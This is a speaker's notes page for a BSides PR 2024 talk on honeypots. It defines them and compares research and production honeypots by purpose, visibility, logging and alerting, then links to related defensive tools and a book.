Page cover

BSIDES PR 2024

Hi there! Here are some notes and information on my BSIDES PR 2024 presentation.

Get presentation

You can download the presentation below:

5MB
Exported-Honeypot with Caution - BsidesPR v1.pdf
PDF
Open

Honeypot definition

A honeypot is a cybersecurity defense resource whose value lies in being probed, attacked, or compromised.

A honeypot is a security mechanism that creates a virtual trap to lure attackers.

Common characteristics:

  • Deceptive

  • Discoverable

  • Interactive

  • Monitored

Honeypots types

Research

  • Research Honeypots typically manifest as simulated systems or services and are primarily used to observe attacker behavior or track the spread of malware. These honeypots generate extensive log data but generally do not interact deeply with attackers. Therefore, they are considered low-interaction honeypots.

Talking Points
Description

Observation of Attacker Behavior

Research honeypots are utilized to observe the behavior of attackers, providing insights for threat analysis.

Tracking Self-Replicating Malware

They are instrumental in tracking the spread and behavior of self-replicating malware across networks.

Utilization by Threat Researchers

These honeypots are primarily used by threat researchers to gather intelligence on cyber threats.

Public Accessibility

Research honeypots are typically visible from the internet, allowing for widespread data collection.

Generation of Log Data

They generate extensive log data, providing valuable information for analysis and research purposes.

Manifestation as Systems or Services

They manifest as simulated systems or services, mimicking real-world targets to attract attackers.

Production

  • Production Honeypots, on the other hand, function as Intrusion Detection Systems (IDS) within a network. They generate alerts upon detecting suspicious activity and may trigger responses if attackers interact with them. Since they actively monitor and respond to network activity, they are considered high-interaction honeypots.

Talking Points
Description

Intrusion Detection System (IDS)

Production honeypots function as IDS, detecting the presence of attackers within a network.

Deployment by Blue Teamers

Blue teamers deploy these honeypots for defensive purposes, enhancing the security posture of their networks.

Internal Visibility

They are visible internally within the network, allowing for monitoring and detection of internal threats.

Alert Generation

Production honeypots generate alerts upon detecting suspicious activity, enabling timely response to threats.

Manifestation as Services or Tokens

They manifest as services or tokens within the network, mimicking legitimate assets to lure attackers.

Low False Positive Rate

Known for their low false positive rate, as legitimate traffic is minimal within honeypot environments.

Concealment from Attackers

They are designed to be difficult for attackers to differentiate from genuine assets within the network.

Triggered Response

If attackers identify and interact with a production honeypot, it triggers a response for further investigation.

References

LogoNew Book: Intrusion Detection Honeypots | Chris SandersChris Sanders | Information Security Analyst, Author, and Instructor
LogoGitHub - telekom-security/tpotce: 🍯 T-Pot - The All In One Multi Honeypot Platform 🐝GitHub
LogoSecurity Onion Solutionssecurityonionsolutions.com
LogoGitHub - OpenCTI-Platform/opencti: Open Cyber Threat Intelligence PlatformGitHub

Last updated